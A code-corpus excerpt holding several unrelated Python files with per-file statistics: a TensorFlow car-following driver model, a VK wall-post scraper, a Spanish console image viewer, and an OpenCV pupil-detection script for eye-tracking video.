proj_att = self.belief_net.z_proj_att(tf.concat([z_att, env_state], axis=-1))
idm_params = self.idm_layer(proj_idm)
act_seq, _ = self.forward_sim.rollout([\
idm_params, proj_att, inputs[2], inputs[-1]])
# tf.print('###############:')
# tf.print('att_scoreax: ', tf.reduce_max(att_scores))
# tf.print('att_scorein: ', tf.reduce_min(att_scores))
# tf.print('att_scoreean: ', tf.reduce_mean(att_scores))
return act_seq, pri_params, pos_params
class BeliefModel(tf.keras.Model):
def __init__(self, config):
super(BeliefModel, self).__init__(name="BeliefModel")
self.proj_dim = 64
self.latent_dim = config['model_config']['latent_dim']
self.architecture_def()
def architecture_def(self):
self.pri_mean = Dense(self.latent_dim)
self.pri_logsigma = Dense(self.latent_dim)
self.pos_mean = Dense(self.latent_dim)
self.pos_logsigma = Dense(self.latent_dim)
self.pri_projection = Dense(self.proj_dim, activation=LeakyReLU())
self.pos_projection = Dense(self.proj_dim, activation=LeakyReLU())
####
self.proj_idm_1 = Dense(self.proj_dim, activation=LeakyReLU())
self.proj_idm_2 = Dense(self.proj_dim, activation=LeakyReLU())
self.proj_idm_3 = Dense(self.proj_dim)
self.proj_att_1 = Dense(self.proj_dim, activation=LeakyReLU())
self.proj_att_2 = Dense(self.proj_dim, activation=LeakyReLU())
self.proj_att_3 = Dense(self.proj_dim)
def sample_z(self, dis_params):
z_mean, z_logsigma = dis_params
_epsilon = tf.random.normal(shape=(tf.shape(z_mean)[0],
self.latent_dim), mean=0., stddev=1)
z_sigma = K.exp(z_logsigma)
sampled_z = z_mean + z_sigma*_epsilon
# tf.print('z_min: ', tf.reduce_min(z_sigma))
return sampled_z[:, :3], sampled_z[:, 3:]
def z_proj_idm(self, x):
x = self.proj_idm_1(x)
x = self.proj_idm_2(x)
x = self.proj_idm_3(x)
return x
def z_proj_att(self, x):
x = self.proj_att_1(x)
x = self.proj_att_2(x)
x = self.proj_att_3(x)
return x
def call(self, inputs, dis_type):
if dis_type == 'both':
enc_h, enc_f = inputs
# prior
pri_context = self.pri_projection(enc_h)
pri_mean = self.pri_mean(pri_context)
pri_logsigma = self.pri_logsigma(pri_context)
# posterior
pos_context = self.pos_projection(tf.concat([enc_h, enc_f], axis=-1))
pos_mean = self.pos_mean(pos_context)
pos_logsigma = self.pos_logsigma(pos_context)
pri_params = [pri_mean, pri_logsigma]
pos_params = [pos_mean, pos_logsigma]
return pri_params, pos_params
elif dis_type == 'prior':
pri_context = self.pri_projection(inputs)
pri_mean = self.pri_mean(pri_context)
pri_logsigma = self.pri_logsigma(pri_context)
pri_params = [pri_mean, pri_logsigma]
return pri_params
class HistoryEncoder(tf.keras.Model):
def __init__(self):
super(HistoryEncoder, self).__init__(name="HistoryEncoder")
self.enc_units = 128
self.architecture_def()
def architecture_def(self):
self.lstm_layer = LSTM(self.enc_units)
def call(self, inputs):
enc_h = self.lstm_layer(inputs)
return enc_h
class FutureEncoder(tf.keras.Model):
def __init__(self):
super(FutureEncoder, self).__init__(name="FutureEncoder")
self.enc_units = 128
self.architecture_def()
def architecture_def(self):
self.lstm_layer = Bidirectional(LSTM(self.enc_units), merge_mode='concat')
def call(self, inputs):
enc_acts = self.lstm_layer(inputs)
return enc_acts
class IDMForwardSim(tf.keras.Model):
def __init__(self, config):
super(IDMForwardSim, self).__init__(name="IDMForwardSim")
self.attention_temp = config['model_config']['attention_temp']
self.proj_dim = 64
self.dec_units = 128
self.architecture_def()
def architecture_def(self):
self.lstm_layer = LSTM(self.dec_units, return_sequences=True, return_state=True)
self.res_act_neu = TimeDistributed(Dense(1))
self.att_neu = TimeDistributed(Dense(1))
def idm_driver(self, vel, dv, dx, idm_params):
dx = tf.clip_by_value(dx, clip_value_min=1, clip_value_max=100.)
desired_v = idm_params[:,:,0:1]
desired_tgap = idm_params[:,:,1:2]
min_jamx = idm_params[:,:,2:3]
max_act = idm_params[:,:,3:4]
min_act = idm_params[:,:,4:5]
_gap_denum = 2*tf.sqrt(max_act*min_act)
_gap = desired_tgap*vel+(vel*dv)/_gap_denum
desired_gap = min_jamx + K.relu(_gap)
act = max_act*(1-(vel/desired_v)**4-\
(desired_gap/dx)**2)
# return self.action_clip(act)
return self.action_clip(act)
def action_clip(self, action):
"This is needed to avoid infinities"
return tf.clip_by_value(action, clip_value_min=-6, clip_value_max=6)
def scale_env_s(self, env_state):
env_state = (env_state-self.env_scaler.mean_)/self.env_scaler.var_**0.5
return env_state
def get_att(self, lstm_output):
att_x = self.att_neu(lstm_output)
return 1/(1+tf.exp(-self.attention_temp*att_x))
def handle_merger(self, em_act, dx, m_veh_exists):
"""??
"""
dummy_mul = tf.cast(tf.greater(dx*m_veh_exists, 0), tf.float32)
random_act = tf.random.normal(shape=(tf.shape(dx)[0], 1, 1), \
mean=0., stddev=0.1)
return em_act*dummy_mul + (1-dummy_mul)*random_act
def rollout(self, inputs):
idm_params, proj_belief, idm_s, merger_cs = inputs
batch_size = tf.shape(idm_s)[0]
idm_params = tf.reshape(idm_params, [batch_size, 1, 5])
proj_latent = tf.reshape(proj_belief, [batch_size, 1, self.proj_dim])
state_h = state_c = tf.zeros([batch_size, self.dec_units])
for step in range(30):
f_veh_v = idm_s[:, step:step+1, 1:2]
m_veh_v = idm_s[:, step:step+1, 2:3]
f_veh_glob_x = idm_s[:, step:step+1, 4:5]
m_veh_glob_x = idm_s[:, step:step+1, 5:6]
em_dv_true = idm_s[:, step:step+1, 8:9]
em_delta_x_true = idm_s[:, step:step+1, 9:10]
# these to deal with missing cars
m_veh_exists = idm_s[:, step:step+1, -1:]
if step == 0:
ego_v = idm_s[:, step:step+1, 0:1]
ego_glob_x = idm_s[:, step:step+1, 3:4]
else:
ego_v += _act*0.1
ego_glob_x += ego_v*0.1 + 0.5*_act*0.1**2
ef_delta_x = (f_veh_glob_x - ego_glob_x)
em_delta_x = (m_veh_glob_x - ego_glob_x)*m_veh_exists+\
(1-m_veh_exists)*self.dummy_value_set['em_delta_x']
ef_dv = (ego_v - f_veh_v)
em_dv = (ego_v - m_veh_v)*m_veh_exists+\
(1-m_veh_exists)*self.dummy_value_set['em_delta_v']
# tf.print('############ ef_act ############')
env_state = tf.concat([ego_v, f_veh_v, \
ef_dv, ef_delta_x, em_dv, em_delta_x], axis=-1)
env_state = self.scale_env_s(env_state)
merger_c = merger_cs[:, step:step+1, :]
lstm_output, state_h, state_c = self.lstm_layer(tf.concat([\
proj_latent, env_state, merger_c], axis=-1), \
initial_state=[state_h, state_c])
att_score = self.get_att(lstm_output)
ef_act = self.idm_driver(ego_v, ef_dv, ef_delta_x, idm_params)
em_act = self.idm_driver(ego_v, em_dv, em_delta_x, idm_params)
em_act = self.handle_merger(em_act, em_delta_x, m_veh_exists)
# att_score = idm_s[:, step:step+1, -3:-2]
_act = (1-att_score)*ef_act + att_score*em_act
if step == 0:
act_seq = _act
att_seq = att_score
else:
act_seq = tf.concat([act_seq, _act], axis=1)
att_seq = tf.concat([att_seq, att_score], axis=1)
# tf.print('att_score: ', tf.reduce_mean(att_seq))
return act_seq, att_seq
class IDMLayer(tf.keras.Model):
def __init__(self):
super(IDMLayer, self).__init__(name="IDMLayer")
self.architecture_def()
def architecture_def(self):
self.des_v_neu = Dense(1)
self.des_tgap_neu = Dense(1)
self.min_jamx_neu = Dense(1)
self.max_act_neu = Dense(1)
self.min_act_neu = Dense(1)
def get_des_v(self, x):
output = self.des_v_neu(x)
minval = 10
maxval = 30
return minval + (maxval-minval)/(1+tf.exp(-1.*output))
def get_des_tgap(self, x):
output = self.des_tgap_neu(x)
minval = 0
maxval = 3
return minval + (maxval-minval)/(1+tf.exp(-1.*output))
def get_min_jamx(self, x):
output = self.min_jamx_neu(x)
minval = 0
maxval = 6
return minval + (maxval-minval)/(1+tf.exp(-1.*output))
def get_max_act(self, x):
output = self.max_act_neu(x)
minval = 1
maxval = 6
return minval + (maxval-minval)/(1+tf.exp(-1.*output))
def get_min_act(self, x):
output = self.min_act_neu(x)
minval = 1
maxval = 6
return minval + (maxval-minval)/(1+tf.exp(-1.*output))
def call(self, x):
desired_v = self.get_des_v(x)
desired_tgap = self.get_des_tgap(x)
min_jamx = self.get_min_jamx(x)
max_act = self.get_max_act(x)
min_act = self.get_min_act(x)
idm_param = tf.concat([desired_v, desired_tgap, min_jamx, max_act, min_act], axis=-1)
return idm_param
| 40.027624 | 99 | 0.601173 | 2,030 | 14,490 | 3.953202 | 0.115764 | 0.022928 | 0.015078 | 0.014953 | 0.428162 | 0.341931 | 0.263551 | 0.216822 | 0.184548 | 0.155389 | 0 | 0.015587 | 0.282747 | 14,490 | 361 | 100 | 40.138504 | 0.756567 | 0.041132 | 0 | 0.216312 | 0 | 0 | 0.016311 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.134752 | false | 0 | 0.024823 | 0.003546 | 0.262411 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2f97e2b14d71f15a402efe25816b69f24939597 | 2,540 | py | Python | utils/csv_to_dataset.py | nikitaardashev/Vk-BD-ML | 40d52e944a56b8bcb588ce0c79755cdb9c050018 | [
"MIT"
] | 2 | 2021-01-14T20:47:43.000Z | 2021-01-27T05:46:56.000Z | utils/csv_to_dataset.py | nikitaardashev/Vk-BD-ML | 40d52e944a56b8bcb588ce0c79755cdb9c050018 | [
"MIT"
] | null | null | null | utils/csv_to_dataset.py | nikitaardashev/Vk-BD-ML | 40d52e944a56b8bcb588ce0c79755cdb9c050018 | [
"MIT"
] | 1 | 2021-01-27T05:48:54.000Z | 2021-01-27T05:48:54.000Z | import requests
import csv
import os
import shutil
from time import time
key = ''
count = 1 # Количество постов с каждой стены
def get_posts(owner_id, count, key):
global error
owner_id = -abs(int(owner_id))
try:
res = requests.get('https://api.vk.com/method/wall.get', {
'access_token': key,
'owner_id': owner_id,
'v': 5.126,
'count': count
}, timeout=1).json()
if "error" in res:
print(f'\r{res["error"]["error_msg"]} (owner_id: {owner_id}){" " * 20}')
error += 1
if res["error"]["error_code"] == 29:
exit(res["error"]["error_code"])
else:
return []
return res["response"]["items"]
except requests.exceptions.ReadTimeout:
error += 1
return []
error = 0
try:
shutil.rmtree("dataset")
except FileNotFoundError:
pass
os.mkdir("dataset")
os.mkdir("dataset/train")
os.mkdir("dataset/test")
try:
with open('obrazovanie_2.csv', 'r', encoding='utf-8-sig') as f:
line_total = sum(1 for row in f)
line_count = 0
with open('obrazovanie_2.csv', 'r', encoding='utf-8-sig') as csv_file:
reader = csv.reader(csv_file, delimiter=';')
written = {}
print("==================\nDownoading data...")
print("0% ", end='')
start_time = time()
for owner_id, domain, label in reader:
label = label.lower()
if label not in written:
written[label] = 0
os.mkdir(f'dataset/train/{label}')
for post in get_posts(owner_id, count, key):
if not post["marked_as_ads"]:
fname = f'dataset/train/{label}/post_{written[label]}.txt'
with open(fname, 'w') as f:
f.write(post["text"])
written[label] += 1
line_count += 1
percent = round((line_count / line_total) * 100, 2)
time_left = (time() - start_time) / percent * 100
print(f"\r[{('#' * (int(percent) // 10)).ljust(10, ' ')}] "
f"{percent}% ({int(time_left) // 60}m left) "
f"(Errors: {error}) "
f"({line_count}/{line_total})",
end='')
print(f'\r=================={" " * 50}')
print(f"Successfully loaded {line_count - error} of {line_total} "
f"(Errors: {error})")
except FileNotFoundError:
print("csv not found")
| 29.882353 | 84 | 0.506299 | 303 | 2,540 | 4.128713 | 0.369637 | 0.05036 | 0.016787 | 0.023981 | 0.102318 | 0.102318 | 0.065548 | 0.065548 | 0.065548 | 0.065548 | 0 | 0.022261 | 0.327953 | 2,540 | 84 | 85 | 30.238095 | 0.710603 | 0.012598 | 0 | 0.128571 | 0 | 0 | 0.257382 | 0.070231 | 0 | 0 | 0 | 0 | 0 | 1 | 0.014286 | false | 0.014286 | 0.071429 | 0 | 0.128571 | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2facf988b0820dc925e55e9acf9afe7c74e8e86 | 2,920 | py | Python | image_transformation/consola_visor_imagenes.py | alxus27/PythonForCats | 7a082fd0f21e77b876bc8afea74e5264758e27ac | [
"MIT"
] | 4 | 2020-05-12T18:34:13.000Z | 2020-07-17T01:05:08.000Z | image_transformation/consola_visor_imagenes.py | alxus27/PythonForCats | 7a082fd0f21e77b876bc8afea74e5264758e27ac | [
"MIT"
] | 2 | 2020-06-05T23:33:53.000Z | 2020-06-05T23:48:11.000Z | image_transformation/consola_visor_imagenes.py | alxus27/PythonForCats | 7a082fd0f21e77b876bc8afea74e5264758e27ac | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Ejemplo Nivel 4: Visor de imágenes
Temas:
* Matrices
@author: zejiran
"""
import visor_imagenes
def imprimir_menu_principal():
# Imprime los items del menú principal de la aplicación.
print("\nVisor de imágenes\n")
print("(1) Cargar imagen")
print("(2) Negativo")
print("(3) Reflejar")
print("(4) Binarizar")
print("(5) Escala de grises")
print("(6) Convolución")
print("(7) Salir")
def cargar_imagen() -> list:
# Muestra las opciones para cargar una imagen y carga la imagen seleccionada por el usuario.
ruta = input("Ingrese el nombre del archivo que contiene la imagen: ")
image = visor_imagenes.cargar_imagen(ruta)
visor_imagenes.visualizar_imagen(image)
return image
def ejecutar_binarizar_imagen(image: list) -> list:
""" Pide al usuario el umbral deseado y binariza la imagen recibida por parámetro.
Parámetros:
imagen (list) Matriz (M,N,3) con la imagen a binarizar.
"""
umbral = float(input("Ingrese el umbral (valor entre 0 y 1):"))
print("Calculando imagen...")
image = visor_imagenes.binarizar_imagen(image, umbral)
visor_imagenes.visualizar_imagen(image)
return image
def ejecutar_convolucionar_imagen(image: list) -> list:
""" Aplica la convolución a la imagen recibida por parámetro.
Parámetros:
imagen (list) Matriz (M,N,3) con la imagen a convolucionar.
"""
print("Calculando imagen...")
image = visor_imagenes.convolucion_imagen(image)
visor_imagenes.visualizar_imagen(image)
return image
def ejecutar_convertir_negativo(image: list) -> list:
print("Calculando imagen...")
image = visor_imagenes.convertir_negativo(image)
visor_imagenes.visualizar_imagen(image)
return image
def ejecutar_reflejar_imagen(image: list) -> list:
print("Calculando imagen...")
image = visor_imagenes.reflejar_imagen(image)
visor_imagenes.visualizar_imagen(image)
return image
def ejecutar_convertir_a_grises(image: list) -> list:
print("Calculando imagen...")
image = visor_imagenes.convertir_a_grises(image)
visor_imagenes.visualizar_imagen(image)
return image
salir = False
while not salir:
imprimir_menu_principal()
opcion = int(input("Ingrese la opción deseada: "))
if opcion == 1:
image = cargar_imagen()
elif opcion == 2:
image = ejecutar_convertir_negativo(image)
elif opcion == 3:
image = ejecutar_reflejar_imagen(image)
elif opcion == 4:
image = ejecutar_binarizar_imagen(image)
elif opcion == 5:
image = ejecutar_convertir_a_grises(image)
elif opcion == 6:
image = ejecutar_convolucionar_imagen(image)
elif opcion == 7:
salir = True
else:
print("El valor ingresado no es válido.")
| 29.2 | 97 | 0.665068 | 351 | 2,920 | 5.378917 | 0.293447 | 0.122352 | 0.095339 | 0.101695 | 0.424258 | 0.405191 | 0.363877 | 0.363877 | 0.337394 | 0.25053 | 0 | 0.008953 | 0.234932 | 2,920 | 99 | 98 | 29.494949 | 0.836168 | 0.180137 | 0 | 0.278689 | 0 | 0 | 0.164664 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.114754 | false | 0 | 0.016393 | 0 | 0.229508 | 0.229508 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2fb354cbc108a6ea1f89565ec3de4f88cf84b32 | 22,630 | py | Python | PythonAnalysisScripts/preprocessing/Average_Clip_Per_Day_PupilDetection.py | everymind/SurprisingMinds-Analysis | eeb308043f471de3cdb505f82461cf8d6cf40e16 | [
"MIT"
] | null | null | null | PythonAnalysisScripts/preprocessing/Average_Clip_Per_Day_PupilDetection.py | everymind/SurprisingMinds-Analysis | eeb308043f471de3cdb505f82461cf8d6cf40e16 | [
"MIT"
] | 1 | 2020-11-20T03:38:36.000Z | 2020-11-20T03:38:36.000Z | PythonAnalysisScripts/preprocessing/Average_Clip_Per_Day_PupilDetection.py | everymind/SurprisingMinds-Analysis | eeb308043f471de3cdb505f82461cf8d6cf40e16 | [
"MIT"
] | 1 | 2020-11-19T23:52:46.000Z | 2020-11-19T23:52:46.000Z | import os
import glob
import cv2
import datetime
import numpy as np
import matplotlib.pyplot as plt
import zipfile
import shutil
import fnmatch
import sys
import math
import csv
### FUNCTIONS ###
def unpack_to_temp(path_to_zipped, path_to_temp):
try:
# copy zip file to current working directory
#print("Copying {folder} to current working directory...".format(folder=path_to_zipped))
current_working_directory = os.getcwd()
copied_zipped = shutil.copy2(path_to_zipped, current_working_directory)
path_to_copied_zipped = os.path.join(current_working_directory, copied_zipped.split(sep=os.sep)[-1])
# unzip the folder
#print("Unzipping files in {folder}...".format(folder=path_to_copied_zipped))
day_unzipped = zipfile.ZipFile(path_to_copied_zipped, mode="r")
# extract files into temp folder
day_unzipped.extractall(path_to_temp)
# close the unzipped file
day_unzipped.close()
#print("Finished unzipping {folder}!".format(folder=path_to_copied_zipped))
# destroy copied zipped file
#print("Deleting {file}...".format(file=path_to_copied_zipped))
os.remove(path_to_copied_zipped)
#print("Deleted {file}!".format(file=path_to_copied_zipped))
return True
except Exception:
print("Could not unzip {folder}".format(folder=path_to_zipped))
return False
def list_sub_folders(path_to_root_folder):
# List all sub folders
sub_folders = []
for folder in os.listdir(path_to_root_folder):
if(os.path.isdir(os.path.join(path_to_root_folder, folder))):
sub_folders.append(os.path.join(path_to_root_folder, folder))
return sub_folders
def find_target_frame(ref_timestamps_csv, target_timestamps_csv, ref_frame):
# Find the frame in one video that best matches the timestamp of ref frame from another video
# Get ref frame time
ref_timestamp = ref_timestamps_csv[ref_frame]
ref_timestamp = ref_timestamp.split('+')[0][:-1]
ref_time = datetime.datetime.strptime(ref_timestamp, "%Y-%m-%dT%H:%M:%S.%f")
# Generate delta times (w.r.t. start_frame) for every frame timestamp
frame_counter = 0
for timestamp in target_timestamps_csv:
timestamp = timestamp.split('+')[0][:-1]
time = datetime.datetime.strptime(timestamp, "%Y-%m-%dT%H:%M:%S.%f")
timedelta = ref_time - time
seconds_until_alignment = timedelta.total_seconds()
if(seconds_until_alignment < 0):
break
frame_counter = frame_counter + 1
return frame_counter
def find_darkest_circle(list_of_circles, source_image):
#print("Finding darkest circle in {list}...".format(list=list_of_circles))
# starting parameters
darkest_intensity = 255
darkest_index = 0
# check that source_image is a grayscaled image
if len(source_image.shape) > 2:
print("{Image} is not grayscale!".format(Image=source_image))
exit()
for i in range(len(list_of_circles)):
# make a copy of the source image
copied_image = source_image.copy()
# create a mask image that is the same size as source_image
mask = np.zeros(copied_image.shape, copied_image.dtype)
# get center coordinates and radius of circle from list_of_circle
center = (list_of_circles[i][0], list_of_circles[i][1])
radius = list_of_circles[i][2]
#print("Center: {x},{y}".format(x=center[0], y=center[1]))
# draw mask circle at coordinates and w/radius of circle from list_of_circles
mask_circle = cv2.circle(mask, center, radius, 255, -1)
## for debugging
# this_circle = cv2.circle(copied_image, center, radius, (0, 0, 255), 2)
# plt.imshow(copied_image)
# plt.show()
# get coordinates of mask circle pixels
where = np.where(mask==255)
# find those same coordinates in source_image
intensity_inside_circle_on_source_image = source_image[where[0], where[1]]
# take average of those pixels in source_image
average_intensity = np.average(intensity_inside_circle_on_source_image)
#print("Average intensity of circle {number}: {intensity}".format(number=i, intensity=average_intensity))
# check this circle's intensity against darkest circle found so far
if (average_intensity < darkest_intensity):
darkest_intensity = average_intensity
darkest_index = i
#print("Darkest circle: {number}, intensity {intensity}".format(number=darkest_index, intensity=darkest_intensity))
return list_of_circles[darkest_index]
def make_time_buckets(start_timestamp, bucket_size_ms, end_timestamp, fill_pattern):
start_timestamp = start_timestamp.split('+')[0][:-3]
end_timestamp = end_timestamp.split('+')[0][:-3]
buckets_start_time = datetime.datetime.strptime(start_timestamp, "%Y-%m-%dT%H:%M:%S.%f")
buckets_end_time = datetime.datetime.strptime(end_timestamp, "%Y-%m-%dT%H:%M:%S.%f")
current_bucket = buckets_start_time
time_buckets = []
window = datetime.timedelta(milliseconds=bucket_size_ms)
while current_bucket <= buckets_end_time:
time_buckets.append(current_bucket)
current_bucket = current_bucket + window
bucket_list = {key:fill_pattern.copy() for key in time_buckets}
# -5 remains in a time bucket, this means no 'near-enough timestamp' frame was found in video
return bucket_list
def find_nearest_timestamp_key(timestamp_to_check, dict_of_timestamps, time_window):
for key in dict_of_timestamps.keys():
if key <= timestamp_to_check <= (key + time_window):
return key
def find_pupil(which_eye, which_stimuli, trial_number, video_path, video_timestamps, align_frame, csv_path, bucket_size_ms):
### row = timestamp, not frame #
# Open eye video and world video
video = cv2.VideoCapture(video_path)
# Jump to specific frame (position) for alignment purposes
ret = video.set(cv2.CAP_PROP_POS_FRAMES, align_frame)
# Open display window for debugging
video_name = video_path.split(os.sep)[-1]
debug_name = "Eye"+"_"+video_name
cv2.namedWindow(debug_name)
# each time bucket = 4ms (eye cameras ran at 60fps, aka 16.6666 ms per frame)
# octobpus clip to thank you screen is 16.2 seconds
first_timestamp = video_timestamps[align_frame]
last_timestamp = video_timestamps[-1]
initialize_pattern = [-5,-5,-5,-5,-5,-5]
pupil_buckets = make_time_buckets(first_timestamp, bucket_size_ms, last_timestamp, initialize_pattern)
# Loop through 4ms time buckets of eye video to find nearest frame and save pupil xy positon and area
timestamps_to_check = video_timestamps[align_frame:]
for timestamp in timestamps_to_check:
# find the time bucket into which this frame falls
timestamp = timestamp.split('+')[0][:-3]
timestamp_dt = datetime.datetime.strptime(timestamp, "%Y-%m-%dT%H:%M:%S.%f")
bucket_window = datetime.timedelta(milliseconds=bucket_size_ms)
current_key = find_nearest_timestamp_key(timestamp_dt, pupil_buckets, bucket_window)
# Read frame at current position
ret, frame = video.read()
mask = np.copy(frame)
# Make sure the frame exists!
if frame is not None:
# Magically find pupil...
# Convert to grayscale
gray = cv2.cvtColor(frame, cv2.COLOR_RGB2GRAY)
# Median blur
blurred = cv2.medianBlur(gray, 25)
# Hough circle detection
rows = blurred.shape[0]
## sometimes the image seems really clean and easy to find the pupil and yet it still fails
circles = cv2.HoughCircles(blurred, cv2.HOUGH_GRADIENT, 1.0, rows / 9.0,
param1=55, param2=20,
minRadius=10, maxRadius=150)
# If there are no circles, then what??
if circles is not None:
#print("Circles found: {circles}".format(circles=circles))
# check that we are taking the darkest circle
darkest_circle = find_darkest_circle(circles[0], blurred)
#print("Darkest circle: {circle}".format(circle=darkest_circle))
# Using the best circle...crop around center
# Threshold
# Fit an ellipse
# Crop
eye_circle = np.uint16(np.around(darkest_circle))
left = eye_circle[0] - 64
top = eye_circle[1] - 64
crop_size = 128
# Check boundarys of image
if( (left >= 0) and (top >= 0) and ((left + crop_size) < 800) and ((top + crop_size) < 600) ):
cropped = blurred[top:(top + crop_size), left:(left+crop_size)]
# Compute average and stdev of all pixel luminances along border
## this currently averages the rightmost and leftmost edges of the cropped window, because we assume that these pixels are not the pupil
avg = (np.mean(cropped[:, 0]) + np.mean(cropped[:, -1])) / 2
std = (np.std(cropped[:, 0]) + np.std(cropped[:, -1])) / 2
## Find shape of pupil
# Threshold
thresholded = np.uint8(cv2.threshold(cropped, avg-(std*4.5), 255, cv2.THRESH_BINARY_INV)[1])
# Find contours
contours, heirarchy = cv2.findContours(thresholded, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)
# if more than one contour
if len(contours) > 0:
# Get largest contour
largest_contour = max(contours, key=cv2.contourArea)
# sanity check size of largest contour
## SHOULD MAKE SURE THAT LARGEST CONTOUR ISN'T BIGGER THAN CROPPED
#####
# make sure contour is large enough to fit an ellipse to it
if(len(largest_contour) > 5):
# Fit ellipse to largest contour
ellipse = cv2.fitEllipse(largest_contour)
# Shift ellipse back to full frame coordinates
shifted_center = (np.int(ellipse[0][0]) + left, np.int(ellipse[0][1]) + top)
# Draw circles
frame_copy = frame.copy()
circles = np.uint16(np.around(circles))
for i in circles[0, :]:
center = (i[0], i[1])
# circle center
cv2.circle(frame_copy, center, 5, (0, 100, 100), 1)
# circle outline
radius = i[2]
cv2.circle(frame_copy, center, radius, (255, 0, 255), 1)
# Draw ellipse around largest contour
axes = (np.int(ellipse[1][0]/2),np.int(ellipse[1][1]/2))
angle = np.int(ellipse[2])
frame_copy = cv2.ellipse(frame_copy, shifted_center, axes, angle, 0, 360, (0, 255, 0), 3, cv2.LINE_AA, 0)
# Draw debugging circle around darkest circle
axes = (darkest_circle[2], darkest_circle[2])
angle = 0
frame_copy = cv2.ellipse(frame_copy, (darkest_circle[0], darkest_circle[1]), axes, angle, 0, 360, (0, 0, 255), 2, cv2.LINE_AA, 0)
# Save Data
darkest_circle_area = np.pi*(darkest_circle[2])**2
# save data from both findContours and find_darkest_circle
pupil_buckets[current_key][0] = shifted_center[0]
pupil_buckets[current_key][1] = shifted_center[1]
pupil_buckets[current_key][2] = cv2.contourArea(largest_contour)
pupil_buckets[current_key][3] = darkest_circle[0]
pupil_buckets[current_key][4] = darkest_circle[1]
pupil_buckets[current_key][5] = (darkest_circle[2]**2) * math.pi
# Fill debug displays and show
cv2.imshow(debug_name, frame_copy)
ret = cv2.waitKey(1)
else:
#print("Pupil Size: n/a (too small)")
pupil_buckets[current_key][2] = -1
pupil_buckets[current_key][5] = -1
else:
#print("Pupil Size: n/a (pupil off screen)")
pupil_buckets[current_key][2] = -2
pupil_buckets[current_key][5] = -2
else:
#print("Pupil Size: n/a (no contour)")
pupil_buckets[current_key][2] = -3
pupil_buckets[current_key][5] = -3
else:
#print("Pupil Size: n/a (no circles)")
pupil_buckets[current_key][2] = -4
pupil_buckets[current_key][5] = -4
# Save pupil size data
time_chunks = []
for key in pupil_buckets.keys():
time_chunks.append(key)
time_chunks = sorted(time_chunks)
pupils = []
for time in time_chunks:
pupil = pupil_buckets[time]
pupils.append(pupil)
#print("Saving csv of positions and areas for {eye} eye...".format(eye=which_eye))
padded_filename = which_eye + "_" + which_stimuli + "_" + str(trial_number).zfill(4) + ".csv"
csv_file = os.path.join(csv_path, padded_filename)
np.savetxt(csv_file, pupils, fmt='%.2f', delimiter=',')
# release video capture
video.release()
cv2.destroyAllWindows()
def save_average_clip_images(which_eye, no_of_seconds, save_folder_path, images):
# Save images from trial clip to folder
#print("Saving averaged frames from {eye}...".format(eye=which_eye))
for f in range(no_of_seconds):
# Create file name with padded zeros
padded_filename = which_eye + str(f).zfill(4) + ".png"
# Create image file path from save folder
image_file_path = os.path.join(save_folder_path, padded_filename)
# Extract gray frame from clip
gray = np.uint8(images[:,:,f] * 255)
# Write to image file
ret = cv2.imwrite(image_file_path, gray)
### -------------------------------------------- ###
### LET THE ANALYSIS BEGIN!! ###
### log everything in a text file
current_working_directory = os.getcwd()
class Logger(object):
def __init__(self):
# grab today's date
now = datetime.datetime.now()
todays_datetime = datetime.datetime.today().strftime('%Y%m%d-%H%M%S')
log_filename = "PupilDetection_log_" + now.strftime("%Y-%m-%d_%H-%M-%S") + ".txt"
log_file = os.path.join(current_working_directory, log_filename)
self.terminal = sys.stdout
self.log = open(log_file, "a")
def write(self, message):
self.terminal.write(message)
self.log.write(message)
def flush(self):
#this flush method is needed for python 3 compatibility.
#this handles the flush command by doing nothing.
#you might want to specify some extra behavior here.
pass
sys.stdout = Logger()
### ------------------------------------------- ###
# list all folders in Synology drive
# on lab computer
data_drive = r"\\Diskstation\SurprisingMinds"
### FOR DEBUGGING ON LAPTOP ###
#data_drive = r'C:\Users\taunsquared\Desktop\SM_temp'
# get the subfolders, sort their names
data_folders = sorted(os.listdir(data_drive))
zipped_data = fnmatch.filter(data_folders, '*.zip')
zipped_names = [item[:-4] for item in zipped_data]
# skip first day because it was an exhibit debugging day
zipped_data = zipped_data[1:]
# figure out which days have already been analysed
# when working from local drive, lab computer
analysed_drive = r"C:\Users\Kampff_Lab\Dropbox\SurprisingMinds\analysis\dataPythonWorkflows"
# when working from laptop
#analysed_drive = r"C:\Users\taunsquared\Dropbox\SurprisingMinds\analysis\dataPythonWorkflows"
analysed_folders = sorted(os.listdir(analysed_drive))
already_analysed = [item for item in zipped_names if item in analysed_folders]
# unzip each folder, do the analysis
for item in zipped_data:
# check to see if this folder has already been analyzed
if item[:-4] in already_analysed:
print("Folder {name} has already been analysed".format(name=item))
continue
# if this folder hasn't already been analysed, full speed ahead!
print("Working on folder {name}".format(name=item))
this_day_date = item[:-4].split('_')[1]
# grab a folder
day_zipped = os.path.join(data_drive, item)
# Build relative analysis paths in a folder with same name as zip folder
analysis_folder = os.path.join(analysed_drive, item[:-4], "Analysis")
# Analysis subfolders
csv_folder = os.path.join(analysis_folder, "csv")
alignment_folder = os.path.join(analysis_folder, "alignment")
# Create analysis folder (and sub-folders) if it (they) does (do) not exist
if not os.path.exists(analysis_folder):
#print("Creating analysis folder.")
os.makedirs(analysis_folder)
if not os.path.exists(csv_folder):
#print("Creating csv folder.")
os.makedirs(csv_folder)
if not os.path.exists(alignment_folder):
#print("Creating alignment folder.")
